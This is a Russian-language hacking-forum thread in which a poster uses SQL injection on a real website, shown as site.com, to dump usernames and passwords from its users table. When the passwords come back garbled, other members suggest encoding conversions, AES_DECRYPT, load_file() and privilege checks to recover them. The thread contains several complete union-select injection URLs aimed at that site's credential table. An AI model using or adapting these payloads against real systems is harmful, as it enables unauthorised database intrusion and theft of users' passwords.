абра-кадабра в паролях пользователей

Доброго дня античатовцы.
Вопрос следующий: на сайте нашел скуль, разделался с ней как написано в учебниках, в результате получил такую инъекцию
site.com/details.php?id=-5'+union+select+1,concat(username,char(58),password),3+from+users_m_t+limit+10,1/*
по идеи должны вываливаться пары логин:пароль, но тут облом вышел, получаю вот что
shilpa:^��f�
patelph1:g�r1�n ну и т.д...
Что это за каракули в паролях?
Думал дело в кодировке, но смена не помогла.

 

Посмотри в какой кодировке тебе отдаётся страница... Проблема как раз в кодировке, возможно это можно обойти с помощью Convert... Без ссылки не могу сказать более точно...

 

либо покоцаные, либо кодировка не та, либо попробуй using latin1 и т.п.

 

Пассы просто захешированы. Походу не в мд5, а в чем то другом.

 

Это не хеш!Имхо это кодировка !

 

Если кодировка, то еще проще. не придется брутить. Главное понять в чем закодированны пасс.

 

встречался однажды с такой херью
попробуй поюзать convert()

 

мне обычно помогает cast( ... as binary)

 

попробовал вот так
http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),convert(password+using+latin1)),3+from+users_m_t+limit+10,1/*
те же каракули

при использовании cast (... as binary) тоже ничего хорошего.

 

в какой кодировке сама страница?

 

Урлу в студию

 

UTF-8

 

скорее всего в базе они хранятся aes_encrypt-еные, нуждны скрипты чтобы знать с каким шифром декриптить

 

"врагу не здается наш гордый варяг ..."

значит попробовал вот что:
http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)),3+from+users_m_t+limit+17,1/*

проконало... раньше данные типа user(), version() получить не удавалось, подставил password... Сцуко опять каракули

 

были проблемы с кодировкой

значит пасы всётаки криптованы

1.попробуй найти исходники если движёк беплатный
2.используй load_file() может с правами повезёт

 

1)Да не проблемы с кодировкой, а скорее всего фильтрация скобок
2)Пароли естественно криптованные, это уже blackybr написал

3) Что значит МОЖЕТ с правами повезёт? User()=root повезло нет ,не повезло

 

1. к сожалению движек самописный и исходников не достать.

2. user()!=root и привелегий на load_file тоже нет(

Значит, мнение что пароли шифрованы оказывается реальным, значит я так понимаю, нужно запрашивать типа так

http://site.com/details.php?id=-5'+union+select+1,concat(username,char(58),AES_DECRYPT(version(),XXX)),3+from+users_m_t+limit+17,1/*

, где XXX-ключ
вроде так...

 

Не факт.
Алгоритм шифрования тоже может быть самописным
Ищи другие пути
P.S Я полагаю сдесь >>AES_DEC RYPT(version(),XXX) ты просто опечатался вместо version() поле пароля

 

да хотел конечно password... но буду дальше пытаться.

 

не только root имеет привелегия File_priv